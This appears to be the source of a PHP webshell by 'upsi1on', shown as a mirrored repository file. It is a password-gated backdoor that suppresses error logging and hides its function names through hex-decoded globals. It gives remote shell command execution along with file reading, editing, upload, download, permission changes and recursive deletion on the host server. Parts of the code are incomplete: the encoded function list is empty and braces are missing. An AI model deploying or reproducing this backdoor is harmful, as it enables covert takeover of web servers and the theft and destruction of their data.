mirror of
synced 2025-03-15 05:46:57 +00:00
1213 lines
24 KiB
1213 lines
24 KiB
# by upsi1on - thanks to my waifu (Zero Two)
error_reporting (0);
set_time_limit (0);
@ini_set ("error_log", null);
@ini_set ("log_errors", 0);
@ini_set ("max_execution_time", 0);
@ini_set ("output_buffering", 0);
@ini_set ("display_errors", 0);
startEncodeFunction ();
$password = '$2a$12$uKw0MYV.LEA64Y6Cux1UIO2YpJ00P6TqUta4YYhNdnnqElRXrZIiC'; // upsi1on
if (@$GLOBALS[46] ($GLOBALS[47] ($_COOKIE["webshelLoginVerify"]), $password)) {
fix_data ();
if ($_GET["2"] == "ajx-rnm") rnmflodir ();
if ($_GET["2"] == "ajx-del") massDelete ($_GET["0"]);
if ($_GET["2"] == "ajx-download") die (showFileValue ($_GET["0"], false));
if ($_GET["2"] == "ajx-chmod" && isset ($_GET["02"])) exchmd ();
if ($_GET["2"] == "ajx-up" && @$_FILES["post"]["size"] != 0) uploadToDir ();
if ($_GET["2"] == "ajx-file" && isset ($_POST["post"]) && $GLOBALS[24] ($_GET["0"] . "/" . $_GET["02"])) saveFlCh ();
if ($_GET["2"] == "ajx-shell") runShell ();
if (@$_GET["02"] != "") {
if ($_GET["2"] == "ajx-cdir") createDirectory ();
if ($_GET["2"] == "ajx-cfl") createMFl ();
if ($_GET["2"] == "ajx-info") {
infoTbl ();
exit ();
if ($_GET["2"] == "ajx-open") {
showFiles ();
exit ();
if ($_GET["2"] == "ajx-phpinfo") {
$GLOBALS[48] ();
exit ();
<!DOCTYPE html>
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.frdo {
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if (@!$GLOBALS[46] ($GLOBALS[47] ($_COOKIE["webshelLoginVerify"]), $password)) {
if (@!$GLOBALS[46] ($_POST["password"], $password)) {
<h2>webshell by upsi1on</h2>
<form method="post">
<input type="password" name="password" placeholder="password">
<button type="submit"> submit </button>
exit ();
$GLOBALS[45] ("webshelLoginVerify", $GLOBALS[44] ($_POST["password"]));
fix_data ();
if ($_GET["2"] == "file" && @$GLOBALS[22] ($_GET["0"] . "/" . $_GET["02"])) openFile ();
if ($_GET["2"] == "chmod" && @$GLOBALS[10] ($_GET["0"] . "/" . $_GET["02"])) changeAccess ();
if ($_GET["2"] == "shell") {
<div class="phdiv border">
<div class="shellOutput">
<div id="shellOutput"></div>
<div class="shellSubmit">
<b class="pth">shell > </b>
<input type="text" placeholder=". . ." class="inpbold" id="shellInput" autocomplete="off">
<span class="left">
<a class="shact" href="?0=<?=$_GET["0"];?>&2=open">[ back ]</a>
let path = "<?=$_GET["0"];?>"
<?=ajaxTemplate ();?>
input = document.getElementById ("shellInput"),
output = document.getElementById ("shellOutput")
input.addEventListener("keyup", (event) => {
if (event.key === "Enter") {
output.innerHTML = output.innerHTML + "<b class='pth lineBreak'> shell > </b><b class='lineBreak'>" + input.value + "</b><br>"
ajax ("?0=" + path + "&2=ajx-shell", "plushell", input.value)
input.value = ""
if ($_GET["2"] == "phpinfo") {
<div class="phdiv">
<iframe src="?0=<?=$_GET["0"];?>&2=ajx-phpinfo" class="phpinfo"></iframe>
<span class="left">
<a class="shact" href="?0=<?=$_GET["0"];?>&2=open">[ back ]</a>
if ($_GET["2"] == "open") {
<table class="mainTable" id="infoTable">
<?=infoTbl ();?>
<div class="shact">
<a onclick="
document.cookie = 'webshelLoginVerify=; expires=Thu, 01-Jan-70 00:00:01 GMT'
window.location = window.location
">[ logout ]</a>
<a href="?0=<?=$_GET["0"];?>&2=shell">[ shell ]</a>
<a href="?0=<?=$_GET["0"];?>&2=phpinfo">[ phpinfo ]</a>
<table class="mainTable" id="tableData">
<?=showFiles ();?>
<div id="confirModal" class="modal">
<div class="modal-content">
<span id="question"></span>
<span class="frdo">
<a id="confirmTrue">[ yes ]</a>
<a id="confirmf">[ no ]</a>
<div id="commandModal" class="modal">
<div class="modal-content">
<label for="commandInput" id="inputLabelWord"></label>
<input type="text" id="commandInput" autocomplete="off">
<span class="frdo">
<a id="submitCommand">[ submit ]</a>
<a id="abortCommand">[ cancel ]</a>
<?=ajaxTemplate ();?>
tableData = document.getElementById ("tableData"),
infoTable = document.getElementById ("infoTable"),
notificationBlock = document.getElementById ("notificationBlock"),
confirmModal = document.getElementById ("confirModal"),
question = document.getElementById ("question"),
confirmTrue = document.getElementById ("confirmTrue"),
confirmf = document.getElementById ("confirmf"),
abortCommand = document.getElementById ("abortCommand"),
submitCommand = document.getElementById ("submitCommand")
commandInput = document.getElementById ("commandInput"),
commandModal = document.getElementById ("commandModal"),
inputLabelWord = document.getElementById ("inputLabelWord"),
input = document.createElement ("input")
function rnamdirofl (path, newname) {
ajax ("?0=" + path + "&2=ajx-rnm&02=" + newname, "notification")
function cNewFl (path, flnm) {
ajax ("?0=" + path + "&2=ajx-cfl&02=" + flnm, "notification")
function cNewDir (path, dirnm) {
ajax ("?0=" + path + "&2=ajx-cdir&02=" + dirnm, "notification")
function confExec (quest, command) {
question.innerHTML = quest
confirmModal.style.display = "block"
confirmTrue.onclick = function () {
confirmModal.style.display = "none"
eval (command)
confirmf.onclick = function () {
confirmModal.style.display = "none"
function floatInput (word, action) {
inputLabelWord.innerHTML = word + " : "
commandModal.style.display = "block"
submitCommand.onclick = function () {
action = action.replace ("*data", commandInput.value)
commandInput.value = ""
commandModal.style.display = "none"
eval (action)
abortCommand.onclick = function () {
commandModal.style.display = "none"
function selectFileToUp (filePath) {
input.type = "file"
input.onchange = _this => {
ajax ("?0=" + filePath + "&2=ajx-up", "notification", Array.from (input.files))
input = document.createElement ("input")
input.click ()
function fileDataUpdate () {
setTimeout (function () {
ajax ("?0=<?=$_GET["0"];?>&2=ajx-open", tableData)
ajax ("?0=<?=$_GET["0"];?>&2=ajx-info", infoTable)
fileDataUpdate ()
}, 5000)
fileDataUpdate ()
function hdd () {
$hdd["all"] = fs ($GLOBALS[42] ("."));
$hdd["free"] = fs ($GLOBALS[43] ("."));
$hdd["used"] = fs ($GLOBALS[42] (".") - $GLOBALS[43] ("."));
return $hdd;
function fix_path () {
if (!$GLOBALS[10] ($_GET["0"])) {
$loop = $_GET["0"];
while (true) {
if (!$GLOBALS[10] ($loop) && $loop != $GLOBALS[21]($loop)) $loop = $GLOBALS[21]($loop);
else break;
if ($loop == "") $loop = __DIR__;
$_GET["0"] = $loop;
function fix_data () {
$ndIota = ["chmod", "file", "ajx-file"];
$act = ["ajx-del", "ajx-rnm", "ajx-up", "ajx-cdir", "ajx-cfl"];
$read = ["open", "ajx-open"];
$reaf = ["ajx-download"];
$reau = ["ajx-chmod"];
$unvrs = ["phpinfo", "ajx-phpinfo", "ajx-info", "shell", "ajx-shell"];
$all = $GLOBALS[29] (
$read, $GLOBALS[29] (
$act, $GLOBALS[29] (
$unvrs, $GLOBALS[29] (
$ndIota, $GLOBALS[29] (
$reaf, $reau
if (@$_GET["0"] == "") $_GET["0"] = __DIR__;
if (@!$GLOBALS[41] ($_GET["2"], $all)) $_GET["2"] = "open";
if (!$GLOBALS[10] ($_GET["0"]) && !$GLOBALS[41] ($_GET["2"], $act)) fix_path ();
if ($GLOBALS[17] ($_GET["0"]) && $GLOBALS[41] ($_GET["2"], $read)) $_GET["0"] = $GLOBALS[21]($_GET["0"]);
if ($GLOBALS[16] ($_GET["0"]) && $GLOBALS[41] ($_GET["2"], $reaf)) $_GET["2"] = "open";
if (
($GLOBALS[41] ($_GET["2"], $reau) && !$GLOBALS[10] ($_GET["0"]))
($GLOBALS[41] ($_GET["2"], $ndIota) && !isset ($_GET["02"]))
($GLOBALS[41] ($_GET["2"], $ndIota) && @!$GLOBALS[10] ($_GET["0"] . "/" . $_GET["02"]))
($GLOBALS[41] ($_GET["2"], $act) && !$GLOBALS[10] ($_GET["0"]))
($GLOBALS[41] ($_GET["2"], $read) && !$GLOBALS[16] ($_GET["0"]))
) {
$GLOBALS[50] ("HTTP/1.0 500 Internal Server Error");
exit ();
$_GET["0"] = $GLOBALS[20] ("\\", "/", $GLOBALS[27] ($_GET["0"]));
function getPURL () {
$loop = $GLOBALS[27] ($_GET["0"]);
$x = [ $GLOBALS[23] ($loop) ];
if ($GLOBALS[23] ($loop) == "") {
$x = [ $loop ];
$y = [ $GLOBALS[27] ($loop) ];
while (true) {
if ($GLOBALS[21]($loop) != $loop) {
$loop = $GLOBALS[21]($loop);
($GLOBALS[23] ($loop) == "") ? $GLOBALS[40] ($x, $loop) : $GLOBALS[40] ($x, $GLOBALS[23] ($loop));
$GLOBALS[40] ($y, $GLOBALS[27] ($loop));
else break;
$x = $GLOBALS[39] ($x);
$y = $GLOBALS[39] ($y);
$z = 0;
$path = "";
$count = $GLOBALS[38] ($x);
while ($z < $count) {
$path .= " <a href='?0=" . $y[$z] . "&2=open'>" . $GLOBALS[5] ($x[$z]) . "</a> <span class='pth'>〉</span>";
return $path;
function fs ($size) {
if ($size > 1073741824) return $GLOBALS[37] ("%1.2f", $size / 1073741824 )." GiB";
elseif ($size > 1048576) return $GLOBALS[37] ("%1.2f", $size / 1048576 ) ." MiB";
elseif ($size > 1024) return $GLOBALS[37] ("%1.2f", $size / 1024 ) ." KiB";
else return $size ." B";
function expandPath($path) {
if ($GLOBALS[36]("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
$GLOBALS[34] ("echo $match[1]", $stdout);
return $stdout[0] . $match[2];
return $path;
function runShell () {
$stdout = [];
if ($GLOBALS[36] ("/^\s*cd\s*(2>&1)?$/", $_POST["post"])) $GLOBALS[35](expandPath ("~"));
elseif ($GLOBALS[36]("/^\s*cd\s+(.+)\s*(2>&1)?$/", $_POST["post"])) {
$GLOBALS[35] ($_GET["0"]);
$GLOBALS[36] ("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $_POST["post"], $match);
$GLOBALS[35] (expandPath ($match[1]));
else {
$GLOBALS[35] ($_GET["0"]);
$GLOBALS[34] ($_POST["post"], $stdout);
$buff = "";
foreach ($stdout as $result) $buff .= $GLOBALS[5] ($result) . "<br>";
die ($GLOBALS[33] () . "|" . $GLOBALS[20] (" ", " ", $buff));
function perms ($path) {
$filePerms = $GLOBALS[6] ($path);
if (($filePerms & 0xC000) == 0xC000) $info = "s";
elseif (($filePerms & 0xA000) == 0xA000) $info = "l";
elseif (($filePerms & 0x8000) == 0x8000) $info = "-";
elseif (($filePerms & 0x6000) == 0x6000) $info = "b";
elseif (($filePerms & 0x4000) == 0x4000) $info = "d";
elseif (($filePerms & 0x2000) == 0x2000) $info = "c";
elseif (($filePerms & 0x1000) == 0x1000) $info = "p";
else $info = "u";
$info .= (($filePerms & 0x0100) ? "r" : "-");
$info .= (($filePerms & 0x0080) ? "w" : "-");
$info .= (($filePerms & 0x0040) ? (($filePerms & 0x0800) ? "s" : "x" ) : (($filePerms & 0x0800) ? "S" : "-"));
$info .= (($filePerms & 0x0020) ? "r" : "-");
$info .= (($filePerms & 0x0010) ? "w" : "-");
$info .= (($filePerms & 0x0008) ? (($filePerms & 0x0400) ? "s" : "x" ) : (($filePerms & 0x0400) ? "S" : "-"));
$info .= (($filePerms & 0x0004) ? "r" : "-");
$info .= (($filePerms & 0x0002) ? "w" : "-");
$info .= (($filePerms & 0x0001) ? (($filePerms & 0x0200) ? "t" : "x" ) : (($filePerms & 0x0200) ? "T" : "-"));
return $info;
function infoTbl () {
global $serv_ip;
<td colspan='2' class='tdH'>
( your ip : <?=$_SERVER["REMOTE_ADDR"];?> | serv ip : <?=$serv_ip;?> )
<td class='tdH'>sys : </td>
<td class='tdB'><?=$GLOBALS[5] ($GLOBALS[32] ());?></td>
<td class='tdH'>soft : </td>
<td class='tdB'><?=$GLOBALS[5] ($_SERVER["SERVER_SOFTWARE"]);?></td>
<td class='tdH'>php : </td>
<td class='tdB'><?=$GLOBALS[31] ();?></td>
<td class='tdH'>disk : </td>
<td class='tdB'><?=hdd ()["used"];?> / <?=hdd ()["all"];?> (<?=hdd ()["free"];?> free)</td>
<td colspan="2"><br></td>
<td colspan='2' class='tdH'><?=getPURL ();?></td>
function showFiles () {
$dir = $GLOBALS[30] ($_GET["0"]);
if ($GLOBALS[20] ("\\", "/", $GLOBALS[21]($_GET["0"])) == $_GET["0"]) $dir = $GLOBALS[29] (["."], $GLOBALS[28] ($dir, ["..", "."]));
else $dir = $GLOBALS[29] ([".", ".."], $GLOBALS[28] ($dir, ["..", "."]));
$str = "
<th colspan='2' nowrap>[ name ]</th>
<th class='noName' nowrap>[ size ]</th>
<th class='noName' nowrap>[ permission ]</th>
<th class='noName' nowrap>[ modified ]</th>
<th class='fileAct' nowrap>[ action ]</th>
<td colspan='6'><hr></td>
foreach ($dir as $a) {
$flpth = $GLOBALS[20] ("\\", "/", $GLOBALS[27] ($_GET["0"] . "/" . $a));
$dact = "";
$size = "-";
$perms = "<a href='?0=" . $_GET["0"] . "&2=chmod&02=$a'>" . perms ($flpth) . "</a>";
$lm = $GLOBALS[25] ("Y-m-d H:i", $GLOBALS[26] ($flpth));
$a = $GLOBALS[5] ($a);
$type = "<span class='pth'>[?]</span>";
if ($GLOBALS[16] ($flpth)) {
$type = "<span class='pth'>[d]</span>";
if ($GLOBALS[22] ($flpth)) {
$a = "<a href='?0=$flpth&2=open'>$a</a>";
$type = "[d]";
$dact .= "<a onclick=\"floatInput ('File name', 'cNewFl (\'$flpth\', \'*data\')')\">+file</a> <a onclick=\"floatInput ('Dir name', 'cNewDir (\'$flpth\', \'*data\')')\">+dir</a> <a onclick=\"selectFileToUp ('$flpth')\">up</a> <a onclick=\"floatInput ('New name', 'rnamdirofl (\'$flpth\', \'*data\')')\">rename</a> <a onclick=\"confExec ('Delete?', 'ajax (\'?0=$flpth&2=ajx-del\', \'notification\')')\">del</a>";
elseif ($GLOBALS[17] ($flpth)) {
$type = "<span class='pth'>[f]</span>";
$size = fs ($GLOBALS[2] ($flpth));
if ($GLOBALS[22] ($flpth)) $dact .= "<a href='?0=$flpth&2=ajx-download' download='" . $GLOBALS[23] ($flpth) . "'>download</a> ";
$dact .= "<a onclick=\"floatInput ('New name', 'rnamdirofl (\'$flpth\', \'*data\')')\">rename</a> <a onclick=\"confExec ('Delete?', 'ajax (\'?0=$flpth&2=ajx-del\', \'notification\')')\">del</a> ";
if ($GLOBALS[22] ($flpth)) {
$type = "[f]";
$a = "<a href='?0=" . $_GET["0"] . "&2=file&02=$a'>$a</a>";
if ($dact == "") $dact = "-";
$str .= "
<tr class='trFl'>
<td class='typeTd'>$type </td>
<td class='center'>$size</td>
<td class='center'>$perms</td>
<td class='center'>$lm</td>
<td class='right'>$dact</td>
echo $str;
function rnmflodir () {
if (!isset ($_GET["02"])) ;
if ($_GET["02"] == "") echo "New name cannot be empty";
elseif ($GLOBALS[19] ($_GET["0"], $GLOBALS[20] ("\\", "/", $GLOBALS[21]($_GET["0"])) . "/" . $_GET["02"])) echo "Successfully";
else echo "Failed";
exit ();
function deleteProcess ($dirPath) {
if ($GLOBALS[17] ($dirPath)) return $GLOBALS[18] ($dirPath);
elseif ($GLOBALS[16] ($dirPath)) {
$dirPath = ($GLOBALS[15] ($dirPath, -1) != DIRECTORY_SEPARATOR) ? $dirPath . DIRECTORY_SEPARATOR : $dirPath;
$files = $GLOBALS[14] ($dirPath . '*');
foreach ($files as $file) deleteProcess ($file);
return $GLOBALS[13] ($dirPath);
function massDelete ($dirPath) {
$dataDeleted = deleteProcess ($dirPath);
if ($GLOBALS[10] ($_GET["0"]) && $dataDeleted) die ("Successfully deleted some files");
elseif (!$GLOBALS[10] ($_GET["0"]) && $dataDeleted) die ("Successfully");
die ("Failed");
function uploadToDir () {
if (
$GLOBALS[12] (
$_GET["0"] . "/" . $_FILES["post"]["name"]
) die ("Successfully");
die ("Failed");
function createDirectory () {
$pathofDir = $_GET["0"] . "/" . $_GET["02"];
if (!$GLOBALS[10] ($pathofDir)) die (($GLOBALS[11] ($pathofDir)) ? "Successfully" : "Failed");
else die ("File / folder already exists");
function createMFl () {
$pathofFile = $_GET["0"] . "/" . $_GET["02"];
if (!$GLOBALS[10] ($pathofFile)) {
$create = $GLOBALS[4] ($pathofFile, "w");
echo ($create) ? "Successfully" : "Failed";
$GLOBALS[1] ($create);
else echo "File / folder already exists";
exit ();
function exchmd () {
$flPerm = 0;
$perm1 = perms ($_GET["0"]);
if ($GLOBALS[9] ($_GET["02"], "1")) $flPerm |= 0400;
if ($GLOBALS[9] ($_GET["02"], "2")) $flPerm |= 0040;
if ($GLOBALS[9] ($_GET["02"], "3")) $flPerm |= 0004;
if ($GLOBALS[9] ($_GET["02"], "4")) $flPerm |= 0200;
if ($GLOBALS[9] ($_GET["02"], "5")) $flPerm |= 0020;
if ($GLOBALS[9] ($_GET["02"], "6")) $flPerm |= 0002;
if ($GLOBALS[9] ($_GET["02"], "7")) $flPerm |= 0100;
if ($GLOBALS[9] ($_GET["02"], "8")) $flPerm |= 0010;
if ($GLOBALS[9] ($_GET["02"], "9")) $flPerm |= 0001;
$GLOBALS[8] ($_GET["0"], $flPerm);
$GLOBALS[7] ();
if ($perm1 != perms ($_GET["0"])) die ("Successfully");
die ("Failed");
function changeAccess () {
$path = $_GET["0"] . "/" . $_GET["02"];
$chv = $GLOBALS[6] ($path);
$a = ($chv & 00400) ? "checked" : "";
$b = ($chv & 00040) ? "checked" : "";
$c = ($chv & 00004) ? "checked" : "";
$d = ($chv & 00200) ? "checked" : "";
$e = ($chv & 00020) ? "checked" : "";
$f = ($chv & 00002) ? "checked" : "";
$g = ($chv & 00100) ? "checked" : "";
$h = ($chv & 00010) ? "checked" : "";
$i = ($chv & 00001) ? "checked" : "";
<div class="phpinfo">
<table class="chTable">
<th nowrap>[ Permission ]</th>
<th nowrap>[ Owner ]</th>
<th nowrap>[ Group ]</th>
<th nowrap>[ Other ]</th>
<td colspan="4"><hr></td>
<tr class="trFl">
<td class="right">Read</td>
<td class="center"><input type="checkbox" id="b1" <?=$a;?>></td>
<td class="center"><input type="checkbox" id="b2" <?=$b;?>></td>
<td class="center"><input type="checkbox" id="b3" <?=$c;?>></td>
<tr class="trFl">
<td class="right">Write</td>
<td class="center"><input type="checkbox" id="b4" <?=$d;?>></td>
<td class="center"><input type="checkbox" id="b5" <?=$e;?>></td>
<td class="center"><input type="checkbox" id="b6" <?=$f;?>></td>
<tr class="trFl">
<td class="right">Execute</td>
<td class="center"><input type="checkbox" id="b7" <?=$g;?>></td>
<td class="center"><input type="checkbox" id="b8" <?=$h;?>></td>
<td class="center"><input type="checkbox" id="b9" <?=$i;?>></td>
<th colspan="4">
<a href="?0=<?=$_GET["0"];?>&2=open">[ cancel ]</a>
<a onclick="listCheckBox ()">[ submit ]</a>
<?=ajaxTemplate ();?>
function listCheckBox () {
let dataList = "";
for (let i = 1; i < 10; i++) {
document.querySelector("#b" + i).checked ? dataList += i : null
ajax ("?0=<?=$_GET["0"] . "/" . $_GET["02"];?>&2=ajx-chmod&02=" + dataList, "notification")
function ajaxTemplate () {
<div id="mynotification" class="modal">
<div class="modal-content" id="notificationBlock">
<span id="notificationText"></span>
<span class="frdo">
<a id="confirmOk">[ ok ]</a>
notificationtext = document.getElementById ("notificationText"),
notification = document.getElementById ("mynotification"),
confirmOk = document.getElementById ("confirmOk")
function ajax (url, dom, post) {
post = post || null
let xhr = new XMLHttpRequest (),
pst = new FormData ()
if (post != null) {
if (typeof post != "string") {
pst.append ("post", post[0], post[0].name)
else {
pst.append ("post", post)
else {
pst.append ("post", "")
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200 && dom != null) {
if (dom == "notification") {
notificationtext.innerHTML = xhr.responseText
notification.style.display = "block"
confirmOk.onclick = function () {
notification.style.display = "none"
else if (dom == "plushell") {
path = xhr.responseText.split ("|")[0]
document.getElementById ("shellOutput").innerHTML = document.getElementById ("shellOutput").innerHTML + "<br><span class='lineBreak'>" + xhr.responseText.split ("|")[1] + "</span><br>"
else {
dom.innerHTML = xhr.responseText
xhr.open ("POST", url, true)
xhr.send (pst)
delete xhr
function openFile () {
$path = $_GET["0"] . "/" . $_GET["02"];
$textareaValue = showFileValue ($path, true);
<div class="phdiv">
<textarea id="textAreaId" class="phpinfo left"><?=$textareaValue;?></textarea>
<span class="left">
<a href="?0=<?=$_GET["0"];?>&2=open">[ back ]</a>
<a onclick="ajax ('?0=<?=$_GET['0'];?>&2=ajx-file&02=<?=$_GET['02'];?>', 'notification', getElementById ('textAreaId').value)">[ save ]</a>
<?=ajaxTemplate ();?>
function showFileValue ($file, $row) {
$open = $GLOBALS[4] ($file, "r");
$size = ($GLOBALS[2] ($file) == 0) ? 1 : $GLOBALS[2] ($file);
$val = ($row) ? $GLOBALS[5] ($GLOBALS[3] ($open, $size)) : $GLOBALS[3] ($open, $size);
$GLOBALS[1] ($open);
return $val;
function saveFlCh () {
$path = $_GET["0"] . "/" . $_GET["02"];
$open = $GLOBALS[4] ($path, "w");
$size = ($GLOBALS[2] ($path) == 0) ? 1 : $GLOBALS[2] ($path);
$data = $GLOBALS[3] ($open, $size);
if ($GLOBALS[0] ($open, $_POST["post"]) || $data == $_POST["post"]) echo "Successfully";
else echo "Failed";
$GLOBALS[1] ($open);
exit ();
function startEncodeFunction () {
$encFunct = [
$count = count ($encFunct);
for ($i = 0; $i < $count; $i++) {
$n = "";
for ($x = 0; $x < strlen ($encFunct[$i]) - 1; $x += 2){
$n .= chr (hexdec ($encFunct[$i][$x].$encFunct[$i][$x+1]));
$GLOBALS[$i] = $n;